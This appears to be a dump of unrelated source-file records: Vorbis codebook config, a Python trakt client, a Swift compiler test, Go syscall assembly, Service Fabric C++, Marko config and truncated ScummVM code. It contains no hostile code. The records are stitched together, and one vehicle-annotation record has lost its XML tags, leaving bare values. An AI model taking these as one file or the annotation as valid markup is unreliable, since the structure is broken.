16c1_s/res_sub0_part4_pass2.vqd, 2, nonseq cull, 0 +- 1 2 3 4\n:_p5_0 16c1_s/res_sub0_part5_pass2.vqd, 2, nonseq cull, 0 +- 1 2 3 4\n:_p6_0 16c1_s/res_sub0_part6_pass2.vqd, 2, nonseq cull, 0 +- 1 2 3 4 5 6 7 8\n\n\n:_p7_0 16c1_s/res_sub0_part7_pass0.vqd, 4, nonseq cull, 0 +- 11\n:_p7_1 16c1_s/res_sub0_part7_pass1.vqd, 2, nonseq cull, 0 +- 1 2 3 4 5 \n\n:_p8_0 16c1_s/res_sub0_part8_pass0.vqd, 2, nonseq cull, 0 +- 5 10 15 20 25 30\n:_p8_1 16c1_s/res_sub0_part8_pass1.vqd, 2, nonseq cull, 0 +- 1 2 \n\n:_p9_0 16c1_s/res_sub0_part9_pass0.vqd, 2, nonseq, 0 +- 315 630 945 1260 1575 1890\n:_p9_1 16c1_s/res_sub0_part9_pass1.vqd, 2, nonseq, 0 +- 21 42 63 84 105 126 147\n:_p9_2 16c1_s/res_sub0_part9_pass2.vqd, 2, nonseq, 0 +- 1 2 3 4 5 6 7 8 9 10\n\n>_16c2s_s noninterleaved\nhaux 16c2_s/resaux_0.vqd _16c2_s_short 0,64,2 10\n>_16c2_s noninterleaved\nhaux 16c2_s/resaux_1.vqd _16c2_s_long 0,64,2 10\n \n:_p1_0 16c2_s/res_sub0_part1_pass2.vqd, 4, nonseq cull, 0 +- 1\n:_p2_0 16c2_s/res_sub0_part2_pass2.vqd, 4, nonseq cull, 0 +- 1 2\n:_p3_0 16c2_s/res_sub0_part3_pass2.vqd, 2, nonseq cull, 0 +- 1 2 3 4\n:_p4_0 16c2_s/res_sub0_part4_pass2.vqd, 2, nonseq cull, 0 +- 1 2 3 4 5 6 7 8\n\n:_p5_0 16c2_s/res_sub0_part5_pass0.vqd, 4, nonseq cull, 0 +- 11\n:_p5_1 16c2_s/res_sub0_part5_pass1.vqd, 2, nonseq cull, 0 +- 1 2 3 4 5 \n\n:_p6_0 16c2_s/res_sub0_part6_pass0.vqd, 2, nonseq cull, 0 +- 5 10 15 20 25 30\n:_p6_1 16c2_s/res_sub0_part6_pass1.vqd, 2, nonseq cull, 0 +- 1 2 \n\n:_p7_0 16c2_s/res_sub0_part7_pass0.vqd, 2, nonseq, 0 +- 11 22 33 44 55 66\n:_p7_1 16c2_s/res_sub0_part7_pass1.vqd, 2, nonseq cull, 0 +- 1 2 3 4 5\n\n:_p8_0 16c2_s/res_sub0_part8_pass0.vqd, 2, nonseq, 0 +- 21 42 63 84 105 126 147\n:_p8_1 16c2_s/res_sub0_part8_pass1.vqd, 2, nonseq cull, 0 +- 1 2 3 4 5 6 7 8 9 10\n\n:_p9_0 16c2_s/res_sub0_part9_pass0.vqd, 2, nonseq, 0 +- 931 1862 2793 3724 4655 5586 6517 7448 \n:_p9_1 16c2_s/res_sub0_part9_pass1.vqd, 2, nonseq, 0 +- 49 98 147 196 245 294 343 392 441\n:_p9_2 16c2_s/res_sub0_part9_pass2.vqd, 1, nonseq, 0 +- 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 \n\n"} {"text": "from __future__ import absolute_import, division, print_function\n\nfrom trakt.interfaces.base import authenticated\nfrom trakt.interfaces.sync.core.mixins import Get, Add, Remove\n\n\nclass SyncWatchlistInterface(Get, Add, Remove):\n path = 'sync/watchlist'\n flags = {'in_watchlist': True}\n\n def get(self, media=None, page=1, per_page=10, start_at=None, end_at=None, store=None, **kwargs):\n # Build query\n query = {}\n\n if page:\n query['page'] = page\n\n if per_page:\n query['limit'] = per_page\n\n # Request watched history\n return super(SyncWatchlistInterface, self).get(\n media, store,\n query=query,\n flat=media is None,\n **kwargs\n )\n\n @authenticated\n def seasons(self, store=None, **kwargs):\n return self.get(\n 'seasons',\n store,\n **kwargs\n )\n\n @authenticated\n def episodes(self, store=None, **kwargs):\n return self.get(\n 'episodes',\n store,\n **kwargs\n )\n"} {"text": "// RUN: %target-typecheck-verify-swift\n\nlet x: Bool = 3/4 as Float > 1/2 as Float\n\nfunc testInIf(a: Any) {\n if a as? Float {} // expected-error {{cannot be used as a boolean}} {{6-6=((}} {{17-17=) != nil)}}\n let _: Float = a as? Float // expected-error {{value of optional type 'Float?' must be unwrapped}}\n // expected-note@-1{{coalesce}}\n // expected-note@-2{{force-unwrap}}\n}\n"} {"text": "// Copyright 2009 The Go Authors. 
All rights reserved.\n// Use of this source code is governed by a BSD-style\n// license that can be found in the LICENSE file.\n\n// +build !gccgo\n\n#include \"textflag.h\"\n\n//\n// System call support for 386, FreeBSD\n//\n\n// Just jump to package syscall's implementation for all these functions.\n// The runtime may know about them.\n\nTEXT\t·Syscall(SB),NOSPLIT,$0-28\n\tJMP\tsyscall·Syscall(SB)\n\nTEXT\t·Syscall6(SB),NOSPLIT,$0-40\n\tJMP\tsyscall·Syscall6(SB)\n\nTEXT\t·Syscall9(SB),NOSPLIT,$0-52\n\tJMP\tsyscall·Syscall9(SB)\n\nTEXT ·RawSyscall(SB),NOSPLIT,$0-28\n\tJMP\tsyscall·RawSyscall(SB)\n\nTEXT\t·RawSyscall6(SB),NOSPLIT,$0-40\n\tJMP\tsyscall·RawSyscall6(SB)\n"} {"text": "\n\timagesRaw\n\t2017-12-19 12:52:23.942753.jpg\n\t/Users/abell/Development/other.nyc/Camera/imagesRaw/2017-12-19 12:52:23.942753.jpg\n\t\n\t\tUnknown\n\t\n\t\n\t\t352\n\t\t240\n\t\t3\n\t\n\t0\n\t\n\t\tbus\n\t\tUnspecified\n\t\t1\n\t\t0\n\t\t\n\t\t\t1\n\t\t\t149\n\t\t\t108\n\t\t\t234\n\t\t\n\t\n\t\n\t\ttruck\n\t\tUnspecified\n\t\t0\n\t\t0\n\t\t\n\t\t\t163\n\t\t\t123\n\t\t\t180\n\t\t\t141\n\t\t\n\t\n\t\n\t\tcar\n\t\tUnspecified\n\t\t0\n\t\t0\n\t\t\n\t\t\t112\n\t\t\t146\n\t\t\t133\n\t\t\t161\n\t\t\n\t\n\t\n\t\tcar\n\t\tUnspecified\n\t\t0\n\t\t0\n\t\t\n\t\t\t128\n\t\t\t136\n\t\t\t144\n\t\t\t149\n\t\t\n\t\n\t\n\t\tcar\n\t\tUnspecified\n\t\t0\n\t\t0\n\t\t\n\t\t\t148\n\t\t\t135\n\t\t\t160\n\t\t\t144\n\t\t\n\t\n\t\n\t\tcar\n\t\tUnspecified\n\t\t0\n\t\t0\n\t\t\n\t\t\t150\n\t\t\t142\n\t\t\t166\n\t\t\t153\n\t\t\n\t\n\t\n\t\tcar\n\t\tUnspecified\n\t\t0\n\t\t0\n\t\t\n\t\t\t175\n\t\t\t138\n\t\t\t189\n\t\t\t148\n\t\t\n\t\n\t\n\t\tcar\n\t\tUnspecified\n\t\t0\n\t\t0\n\t\t\n\t\t\t199\n\t\t\t147\n\t\t\t220\n\t\t\t162\n\t\t\n\t\n\n"} {"text": "// ------------------------------------------------------------\n// Copyright (c) Microsoft Corporation. All rights reserved.\n// Licensed under the MIT License (MIT). 
See License.txt in the repo root for license information.\n// ------------------------------------------------------------\n\n#include \"Ra.Stdafx.h\"\n\nusing namespace std;\nusing namespace Common;\nusing namespace Reliability;\nusing namespace ReconfigurationAgentComponent;\nusing namespace ReplicationComponent;\nusing namespace ServiceModel;\n\nnamespace\n{\n StringLiteral const ReadStatusTag(\"read\");\n StringLiteral const WriteStatusTag(\"write\");\n}\n\nComStatefulServicePartition::ComStatefulServicePartition(\n Common::Guid const & partitionId, \n FABRIC_REPLICA_ID replicaId, \n ConsistencyUnitDescription const & consistencyUnitDescription, \n bool hasPersistedState,\n std::weak_ptr && failoverUnitProxyWPtr)\n : ComServicePartitionBase(std::move(failoverUnitProxyWPtr)),\n replicaId_(replicaId),\n isServiceOpened_(false),\n createReplicatorAlreadyCalled_(false),\n partitionInfo_(partitionId, consistencyUnitDescription),\n hasPersistedState_(hasPersistedState),\n partitionId_(partitionId)\n{\n}\n\nvoid ComStatefulServicePartition::ClosePartition()\n{\n AcquireWriteLock grab(lock_);\n\n if(!isValidPartition_)\n {\n Assert::CodingError(\"ComStatefulServicePartition duplicate close call.\");\n }\n\n isValidPartition_ = false;\n}\n\nvoid ComStatefulServicePartition::AssertIsValid(Common::Guid const & partitionId, FABRIC_REPLICA_ID replicaId, FailoverUnitProxy const & owner) const\n{\n AcquireReadLock grab(lock_);\n ASSERT_IF(partitionId_ != partitionId, \"PartitionId is invalid {0}\", owner);\n ASSERT_IF(replicaId_ != replicaId, \"ReplicaId is invalid {0}\", owner);\n ASSERT_IF(!isValidPartition_, \"Partition is closed {0}\", owner);\n}\n\nHRESULT ComStatefulServicePartition::GetPartitionInfo(FABRIC_SERVICE_PARTITION_INFORMATION const **bufferedValue)\n{\n if (!bufferedValue)\n {\n return ComUtility::OnPublicApiReturn(E_POINTER);\n }\n\n auto error = CheckIfOpen();\n if (!error.IsSuccess())\n {\n return ComUtility::OnPublicApiReturn(error);\n }\n\n *bufferedValue = partitionInfo_.Value;\n\n return ComUtility::OnPublicApiReturn(S_OK);\n}\n\nHRESULT ComStatefulServicePartition::GetStatus(\n AccessStatusType::Enum type,\n FABRIC_SERVICE_PARTITION_ACCESS_STATUS * valueOut)\n{\n if (!valueOut)\n {\n return ComUtility::OnPublicApiReturn(E_POINTER);\n }\n\n auto error = ErrorCode::Success();\n AccessStatus::Enum accessStatus = AccessStatus::NotPrimary;\n\n {\n AcquireReadLock grab(lock_);\n error = CheckIfOpen(grab);\n if (!error.IsSuccess())\n {\n return ComUtility::OnPublicApiReturn(error);\n }\n\n // Read the value from the partition under the lock\n error = readWriteStatus_.TryGet(type, accessStatus);\n if (!error.IsSuccess())\n {\n return ComUtility::OnPublicApiReturn(error);\n }\n }\n \n if (accessStatus != AccessStatus::NotPrimary)\n {\n FailoverUnitProxySPtr failoverUnitProxy;\n error = LockFailoverUnitProxy(failoverUnitProxy);\n if (!error.IsSuccess())\n {\n return ComUtility::OnPublicApiReturn(error);\n }\n\n if (failoverUnitProxy->ApplicationHostObj.IsLeaseExpired())\n {\n /*\n This returns whether the lease has expired and not whether the lease has failed\n\n If the lease has expired then the node goes into arbitration. At this time the read/write status must be TRY_AGAIN (unless already not primary).\n\n If the node wins arbitration then the lease is no longer expired and the value will be whatever failover determines\n\n If the node loses arbitration it will go down. 
In the future we can add an optimization where during the time the node is going down we return NOT_PRIMARY\n */\n auto original = accessStatus;\n accessStatus = AccessStatus::TryAgain;\n\n RAPEventSource::Events->SFPartitionLeaseExpiredStatus(type == AccessStatusType::Read ? ReadStatusTag : WriteStatusTag, accessStatus, original);\n }\n }\n\n *valueOut = AccessStatus::ConvertToPublicAccessStatus(accessStatus);\n\n return ComUtility::OnPublicApiReturn(error);\n}\n\nHRESULT ComStatefulServicePartition::GetReadStatus(::FABRIC_SERVICE_PARTITION_ACCESS_STATUS *readStatus)\n{\n auto hr = GetStatus(AccessStatusType::Read, readStatus);\n\n ASSERT_IF(SUCCEEDED(hr) && *readStatus == FABRIC_SERVICE_PARTITION_ACCESS_STATUS_INVALID, \"Cannot return invalid read status\");\n return hr;\n}\n\nHRESULT ComStatefulServicePartition::GetWriteStatus(::FABRIC_SERVICE_PARTITION_ACCESS_STATUS *writeStatus)\n{\n auto hr = GetStatus(AccessStatusType::Write, writeStatus);\n\n ASSERT_IF(SUCCEEDED(hr) && *writeStatus == FABRIC_SERVICE_PARTITION_ACCESS_STATUS_INVALID, \"Cannot return invalid write status\");\n return hr;\n}\n\nErrorCode ComStatefulServicePartition::Test_IsLeaseExpired(bool & isLeaseExpired)\n{\n FailoverUnitProxySPtr failoverUnitProxy;\n auto error = LockFailoverUnitProxy(failoverUnitProxy);\n if (!error.IsSuccess())\n {\n return error;\n }\n\n isLeaseExpired = failoverUnitProxy->ApplicationHostObj.IsLeaseExpired();\n return error;\n}\n\nHRESULT ComStatefulServicePartition::CreateReplicator(\n __in ::IFabricStateProvider *stateProvider,\n __in_opt ::FABRIC_REPLICATOR_SETTINGS const *replicatorSettings,\n __out ::IFabricReplicator **replicator,\n __out ::IFabricStateReplicator **stateReplicator)\n{ \n FailoverUnitProxySPtr failoverUnitProxySPtr;\n HRESULT hr = PrepareToCreateReplicator(failoverUnitProxySPtr);\n\n if (!SUCCEEDED(hr))\n {\n return ComUtility::OnPublicApiReturn(hr);\n }\n\n ASSERT_IFNOT(failoverUnitProxySPtr, \"FailoverUnit proxy should be valid\");\n FailoverUnitProxySPtr forReplicator = failoverUnitProxySPtr;\n Common::ComPointer<::IFabricStateReplicator> localReplicator;\n \n hr = failoverUnitProxySPtr->ReplicatorFactory.CreateReplicator(\n replicaId_, \n this, \n stateProvider, \n replicatorSettings,\n hasPersistedState_,\n move(forReplicator),\n localReplicator.InitializationAddress());\n\n if(FAILED(hr))\n {\n RAPEventSource::Events->SFPartitionFailedToCreateReplicator(\n static_cast<_int64>(replicaId_),\n hr);\n return ComUtility::OnPublicApiReturn(hr);\n }\n\n hr = localReplicator->QueryInterface(::IID_IFabricReplicator, (LPVOID*) replicator);\n ASSERT_IFNOT(SUCCEEDED(hr), \"Built-in replicator failed a QI for IFabricReplicator.\");\n \n hr = localReplicator->QueryInterface(::IID_IFabricStateReplicator, (LPVOID*) stateReplicator);;\n ASSERT_IFNOT(SUCCEEDED(hr), \"Built-in replicator failed a QI for IFabricStateReplicator.\");\n\n return ComUtility::OnPublicApiReturn(S_OK);\n}\n\nHRESULT ComStatefulServicePartition::ReportLoad(ULONG metricCount, FABRIC_LOAD_METRIC const *metrics)\n{\n return ComServicePartitionBase::ReportLoad(metricCount, metrics);\n}\n\nHRESULT ComStatefulServicePartition::ReportFault(FABRIC_FAULT_TYPE faultType)\n{\n if (\n faultType != FABRIC_FAULT_TYPE_PERMANENT &&\n faultType != FABRIC_FAULT_TYPE_TRANSIENT)\n {\n return ComUtility::OnPublicApiReturn(ErrorCode(ErrorCodeValue::InvalidArgument));\n }\n\n FailoverUnitProxySPtr failoverUnitProxySPtr;\n auto error = CheckIfOpenAndLockFailoverUnitProxy(failoverUnitProxySPtr);\n if (!error.IsSuccess())\n {\n return 
ComUtility::OnPublicApiReturn(error);\n }\n\n error = failoverUnitProxySPtr->ReportFault(FaultType::FromPublicAPI(faultType));\n return ComUtility::OnPublicApiReturn(error);\n}\n\nHRESULT ComStatefulServicePartition::ReportReplicaHealth(FABRIC_HEALTH_INFORMATION const *healthInformation)\n{\n return ReportReplicaHealth2(healthInformation, nullptr);\n}\n\nHRESULT ComStatefulServicePartition::ReportReplicaHealth2(\n FABRIC_HEALTH_INFORMATION const *healthInformation,\n FABRIC_HEALTH_REPORT_SEND_OPTIONS const *sendOptions)\n{\n if (!healthInformation)\n {\n return ComUtility::OnPublicApiReturn(E_POINTER);\n }\n\n HealthInformation healthInfoObj;\n auto error = healthInfoObj.FromCommonPublicApi(*healthInformation);\n if (!error.IsSuccess())\n {\n return ComUtility::OnPublicApiReturn(move(error));\n }\n\n HealthReportSendOptionsUPtr sendOptionsObj;\n if (sendOptions != nullptr)\n {\n sendOptionsObj = make_unique();\n error = sendOptionsObj->FromPublicApi(*sendOptions);\n if (!error.IsSuccess())\n {\n return ComUtility::OnPublicApiReturn(move(error));\n }\n }\n\n {\n AcquireReadLock grab(lock_);\n if (!isValidPartition_)\n {\n return ComUtility::OnPublicApiReturn(ErrorCode(ErrorCodeValue::ObjectClosed));\n }\n }\n\n auto healthReport = ServiceModel::HealthReport::GenerateReplicaHealthReport(move(healthInfoObj), partitionId_, replicaId_);\n \n FailoverUnitProxySPtr failoverUnitProxySPtr = failoverUnitProxyWPtr_.lock();\n if (failoverUnitProxySPtr)\n {\n error = failoverUnitProxySPtr->ReportHealth(move(healthReport), move(sendOptionsObj));\n return ComUtility::OnPublicApiReturn(move(error));\n }\n\n return ComUtility::OnPublicApiReturn(FABRIC_E_COMMUNICATION_ERROR);\n}\n\nHRESULT ComStatefulServicePartition::ReportPartitionHealth(FABRIC_HEALTH_INFORMATION const *healthInformation)\n{\n return ReportPartitionHealth2(healthInformation, nullptr);\n}\n\nHRESULT ComStatefulServicePartition::ReportPartitionHealth2(\n FABRIC_HEALTH_INFORMATION const *healthInformation,\n FABRIC_HEALTH_REPORT_SEND_OPTIONS const *sendOptions)\n{\n if (!healthInformation)\n {\n return ComUtility::OnPublicApiReturn(E_POINTER);\n }\n\n HealthInformation healthInfoObj;\n auto error = healthInfoObj.FromCommonPublicApi(*healthInformation);\n if (!error.IsSuccess())\n {\n return ComUtility::OnPublicApiReturn(move(error));\n }\n\n HealthReportSendOptionsUPtr sendOptionsObj;\n if (sendOptions != nullptr)\n {\n sendOptionsObj = make_unique();\n error = sendOptionsObj->FromPublicApi(*sendOptions);\n if (!error.IsSuccess())\n {\n return ComUtility::OnPublicApiReturn(move(error));\n }\n }\n\n {\n AcquireReadLock grab(lock_);\n if (!isValidPartition_)\n {\n return ComUtility::OnPublicApiReturn(ErrorCode(ErrorCodeValue::ObjectClosed));\n }\n }\n\n auto healthReport = ServiceModel::HealthReport::GeneratePartitionHealthReport(move(healthInfoObj), partitionId_);\n \n FailoverUnitProxySPtr failoverUnitProxySPtr = failoverUnitProxyWPtr_.lock();\n if (failoverUnitProxySPtr)\n {\n error = failoverUnitProxySPtr->ReportHealth(move(healthReport), move(sendOptionsObj));\n return ComUtility::OnPublicApiReturn(move(error));\n }\n\n return ComUtility::OnPublicApiReturn(FABRIC_E_COMMUNICATION_ERROR);\n}\n\nHRESULT ComStatefulServicePartition::ReportMoveCost(FABRIC_MOVE_COST moveCost)\n{\n FailoverUnitProxySPtr failoverUnitProxySPtr;\n auto error = CheckIfOpenAndLockFailoverUnitProxy(failoverUnitProxySPtr);\n if (!error.IsSuccess())\n {\n return ComUtility::OnPublicApiReturn(error);\n }\n \n vector loadMetrics;\n std::wstring 
moveCostMetricName(*LoadBalancingComponent::Constants::MoveCostMetricName);\n loadMetrics.push_back(LoadBalancingComponent::LoadMetric(move(moveCostMetricName), moveCost));\n\n error = failoverUnitProxySPtr->ReportLoad(move(loadMetrics));\n return ComUtility::OnPublicApiReturn(error);\n}\n\nHRESULT ComStatefulServicePartition::CreateTransactionalReplicator(\n __in ::IFabricStateProvider2Factory * factory,\n __in ::IFabricDataLossHandler * dataLossHandler,\n __in_opt ::FABRIC_REPLICATOR_SETTINGS const *replicatorSettings,\n __in_opt ::TRANSACTIONAL_REPLICATOR_SETTINGS const * transactionalReplicatorSettings,\n __in_opt KTLLOGGER_SHARED_LOG_SETTINGS const * ktlloggerSharedSettings,\n __out ::IFabricPrimaryReplicator ** primaryReplicator,\n __out void ** transactionalReplicator)\n{\n FailoverUnitProxySPtr failoverUnitProxySPtr;\n Common::ComPointer activationContext;\n\n HRESULT hr = PrepareToCreateReplicator(failoverUnitProxySPtr);\n\n if (!SUCCEEDED(hr))\n {\n return ComUtility::OnPublicApiReturn(hr);\n }\n\n ASSERT_IFNOT(failoverUnitProxySPtr, \"FailoverUnit proxy should be valid\");\n\n ErrorCode error = failoverUnitProxySPtr->ApplicationHostObj.GetCodePackageActivationContext(\n failoverUnitProxySPtr->RuntimeId,\n activationContext);\n\n if (!error.IsSuccess())\n {\n return ComUtility::OnPublicApiReturn(error);\n }\n\n FailoverUnitProxySPtr forReplicator = failoverUnitProxySPtr;\n\n hr = failoverUnitProxySPtr->TransactionalReplicatorFactory.CreateReplicator(\n replicaId_, \n failoverUnitProxySPtr->ReplicatorFactory,\n this, \n replicatorSettings,\n transactionalReplicatorSettings,\n ktlloggerSharedSettings,\n *activationContext.GetRawPointer(),\n hasPersistedState_,\n move(forReplicator),\n factory,\n dataLossHandler,\n primaryReplicator,\n (PHANDLE)transactionalReplicator);\n\n if (FAILED(hr))\n {\n RAPEventSource::Events->SFPartitionFailedToCreateReplicator(\n static_cast<_int64>(replicaId_),\n hr);\n }\n\n return ComUtility::OnPublicApiReturn(hr);\n}\n\nHRESULT ComStatefulServicePartition::CreateTransactionalReplicatorInternal(\n __in ::IFabricTransactionalReplicatorRuntimeConfigurations * runtimeConfigurations,\n __in ::IFabricStateProvider2Factory * factory,\n __in ::IFabricDataLossHandler * dataLossHandler,\n __in_opt ::FABRIC_REPLICATOR_SETTINGS const *replicatorSettings,\n __in_opt ::TRANSACTIONAL_REPLICATOR_SETTINGS const * transactionalReplicatorSettings,\n __in_opt KTLLOGGER_SHARED_LOG_SETTINGS const * ktlloggerSharedSettings, \n __out ::IFabricPrimaryReplicator ** primaryReplicator,\n __out void ** transactionalReplicator)\n{\n if (!runtimeConfigurations)\n {\n return ComUtility::OnPublicApiReturn(E_POINTER);\n }\n\n FailoverUnitProxySPtr failoverUnitProxySPtr;\n HRESULT hr = PrepareToCreateReplicator(failoverUnitProxySPtr);\n\n if (!SUCCEEDED(hr))\n {\n return ComUtility::OnPublicApiReturn(hr);\n }\n\n FailoverUnitProxySPtr forReplicator = failoverUnitProxySPtr;\n\n hr = failoverUnitProxySPtr->TransactionalReplicatorFactory.CreateReplicator(\n replicaId_, \n failoverUnitProxySPtr->ReplicatorFactory,\n this, \n replicatorSettings,\n transactionalReplicatorSettings,\n ktlloggerSharedSettings,\n runtimeConfigurations,\n hasPersistedState_,\n move(forReplicator),\n factory,\n dataLossHandler,\n primaryReplicator,\n (PHANDLE)transactionalReplicator);\n\n if (FAILED(hr))\n {\n RAPEventSource::Events->SFPartitionFailedToCreateReplicator(\n static_cast<_int64>(replicaId_),\n hr);\n }\n\n return ComUtility::OnPublicApiReturn(hr);\n}\n\nHRESULT 
ComStatefulServicePartition::GetKtlSystem(\n __out void** ktlSystem)\n{\n FailoverUnitProxySPtr failoverUnitProxySPtr = failoverUnitProxyWPtr_.lock();\n if (!failoverUnitProxySPtr)\n {\n RAPEventSource::Events->SFPartitionCouldNotGetFUP(static_cast<_int64>(replicaId_));\n return ComUtility::OnPublicApiReturn(ErrorCode(ErrorCodeValue::ObjectClosed));\n }\n\n KtlSystem * ktlSystemPtr = nullptr;\n ErrorCode error = failoverUnitProxySPtr->ApplicationHostObj.GetKtlSystem(&ktlSystemPtr);\n if (!error.IsSuccess())\n {\n return ComUtility::OnPublicApiReturn(error);\n }\n \n *ktlSystem = ktlSystemPtr;\n return ComUtility::OnPublicApiReturn(error);\n}\n\nvoid ComStatefulServicePartition::SetReadWriteStatus(ReadWriteStatusValue && value)\n{\n AcquireWriteLock grab(lock_);\n readWriteStatus_ = move(value);\n}\n\nvoid ComStatefulServicePartition::OnServiceOpened()\n{\n AcquireWriteLock grab(lock_);\n \n isServiceOpened_ = true;\n}\n\nFABRIC_SERVICE_PARTITION_ACCESS_STATUS ComStatefulServicePartition::GetReadStatusForQuery() \n{\n FABRIC_SERVICE_PARTITION_ACCESS_STATUS rv = FABRIC_SERVICE_PARTITION_ACCESS_STATUS_INVALID;\n HRESULT hr = GetReadStatus(&rv);\n if (FAILED(hr))\n {\n return FABRIC_SERVICE_PARTITION_ACCESS_STATUS_INVALID;\n }\n\n return rv;\n}\n\nFABRIC_SERVICE_PARTITION_ACCESS_STATUS ComStatefulServicePartition::GetWriteStatusForQuery() \n{\n FABRIC_SERVICE_PARTITION_ACCESS_STATUS rv = FABRIC_SERVICE_PARTITION_ACCESS_STATUS_INVALID;\n HRESULT hr = GetWriteStatus(&rv);\n if (FAILED(hr))\n {\n return FABRIC_SERVICE_PARTITION_ACCESS_STATUS_INVALID;\n }\n\n return rv;\n}\n\nHRESULT ComStatefulServicePartition::PrepareToCreateReplicator(__out FailoverUnitProxySPtr & failoverUnitProxySPtr)\n{\n RAPEventSource::Events->SFPartitionCreatingReplicator(static_cast<_int64>(replicaId_));\n AcquireWriteLock grab(lock_);\n\n if (!isValidPartition_)\n {\n RAPEventSource::Events->SFPartitionInvalidReplica(static_cast<_int64>(replicaId_));\n return ErrorCode(ErrorCodeValue::ObjectClosed).ToHResult();\n }\n\n if (createReplicatorAlreadyCalled_ || isServiceOpened_)\n {\n RAPEventSource::Events->SFPartitionReplicaAlreadyOpen(\n static_cast<_int64>(replicaId_),\n isServiceOpened_,\n createReplicatorAlreadyCalled_);\n return ErrorCode(ErrorCodeValue::InvalidState).ToHResult();\n }\n\n createReplicatorAlreadyCalled_ = true;\n\n failoverUnitProxySPtr = failoverUnitProxyWPtr_.lock();\n\n if (!failoverUnitProxySPtr)\n {\n RAPEventSource::Events->SFPartitionCouldNotGetFUP(static_cast<_int64>(replicaId_));\n return ErrorCode(ErrorCodeValue::ObjectClosed).ToHResult();\n }\n\n return S_OK;\n}\n"} {"text": "{\n \"requireRemap\": [\n {\n \"from\": \"./index.marko\",\n \"to\": \"./index[ds-4].marko\",\n \"if-flag\": \"ds-4\"\n }\n ]\n}\n"} {"text": "/* ScummVM - Graphic Adventure Engine\n *\n * ScummVM is the legal property of its developers, whose names\n * are too numerous to list here. Please refer to the COPYRIGHT\n * file distributed with this source distribution.\n *\n * This program is free software; you can redistribute it and/or\n * modify it under the terms of the GNU General Public License\n * as published by the Free Software Foundation; either version 2\n * of the License, or (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program; if not, write to the Free Software\n * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n *\n */\n\n#include \"bladerunner/set_effects.h\"\n\nnamespace BladeRunner {\n\nSetEffects::SetEffects(BladeRunnerEngine *vm) {\n\t_vm = vm;\n\n\t_distanceColor.r = 1.0f;\n\t_distanceColor.g = 1.0f;\n\t_distanceColor.b = 1.0f;\n\t_distanceCoeficient = 0.1f;\n\n\t_fadeColor.r = 0.0f;\n\t_fadeColor.g = 0.0f;\n\t_fadeColor.b = 0.0f;\n\t_fadeDensity = 0.0f;\n\n\t_fogCount = 0;\n\t_fogs = nullptr;\n}\n\nSetEffects::~SetEffects() {\n\treset();\n}\n\nvoid SetEffects::read(Common::ReadStream *stream, int frameCount) {\n\t_distanceCoeficient = stream->readFloatLE();\n\t_distanceColor.r = stream->readFloatLE();\n\t_distanceColor.g = stream->readFloatLE();\n\t_distanceColor.b = stream->readFloatLE();\n\n\t_fogCount = stream->readUint32LE();\n\tint i;\n\tfor (i = 0; i < _fogCount; ++i) {\n\t\tint type = stream->readUint32LE();\n\t\tFog *fog = nullptr;\n\t\tswitch (type) {\n\t\tcase 0:\n\t\t\tfog = new FogSphere();\n\t\t\tbreak;\n\t\tcase 1:\n\t\t\tfog = new FogCone();\n\t\t\tbreak;\n\t\tcase 2:\n\t\t\tfog = new FogBox();\n\t\t\tbreak;\n\t\tdefault:\n\t\t\terror(\"Unknown fog type %d\", type);\n\t\t}\n\t\tif (fog != nullptr) {\n\t\t\tfog->read(stream, frameCount);\n\t\t\tfog->_next = _fogs;\n\t\t\t_fogs = fog;\n\t\t}\n\t}\n}\n\nvoid SetEffects::reset() {\n\tFog *nextFog;\n\n\tif (!_fogs) {\n\t\treturn;\n\t}\n\n\tdo {\n\t\tnextFog = _fogs->_next;\n\t\tdelete _fogs;\n\t\t_fogs = nextFog;\n\t} while (nextFog);\n}\n\nvoid SetEffects::setupFrame(int frame) {\n\tfor (Fog *fog = _fogs; fog != nullptr; fog = fog->_next) {\n\t\tfog->setupFrame(frame);\n\t}\n}\n\nvoid SetEffects::setFadeColor(float r, float g, float b) {\n\t_fadeColor.r = r;\n\t_fadeColor.g = g;\n\t_fadeColor.b = b;\n}\n\nvoid SetEffects::setFadeDensity(float density) {\n\t_fadeDensity = density;\n}\n\n/**\n* Set fog color for fog effect named fogName.\n* RGB arguments are percentages of red, green and blue\n*/\nvoid SetEffects::setFogColor(const Common::String &fogName, float r, float g, float b) {\n\tFog *fog = findFog(fogName);\n\tif (fog == nullptr) {\n\t\treturn;\n\t}\n\n\tfog->_fogColor.r = r;\n\tfog->_fogColor.g = g;\n\tfog->_fogColor.b = b;\n}\n\nvoid SetEffects::setFogDensity(const Common::String &fogName, float density) {\n\tFog *fog = findFog(fogName);\n\tif (fog == nullptr) {\n\t\treturn;\n\t}\n\n\tfog->_fogDensity = density;\n}\n\nvoid SetEffects::calculateColor(Vector3 viewPosition, Vector3 position, float *outCoeficient, Color *outColor) const {\n\tfloat distanceCoeficient = CLIP((position - viewPosition).length() * _distanceCoeficient, 0.0f, 1.0f);\n\n\t*outCoeficient = 1.0f - distanceCoeficient;\n\toutColor->r = _distanceColor.r * distanceCoeficient;\n\toutColor->g = _distanceColor.g * distanceCoeficient;\n\toutColor->b = _distanceColor.b * distanceCoeficient;\n\n\tfor (Fog *fog = _fogs; fog != nullptr; fog = fog->_next) {\n\t\tfloat fogCoeficient = 0.0f;\n\t\tfog->calculateCoeficient(position, viewPosition, &fogCoeficient);\n\t\tif (fogCoeficient > 0.0f) {\n\t\t\tfogCoeficient = CLIP(fog->_fogDensity * fogCoeficient, 0.0f, 1.0f);\n\n\t\t\t*outCoeficient = *outCoeficient * (1.0f - fogCoeficient);\n\t\t\toutColor->r = outColor->r * (1.0f - fogCoeficient) + fog->_fogColor.r * fogCoeficient;\n\t\t\toutColor->g = outColor->g * (1.0f - fogCoeficient) + 
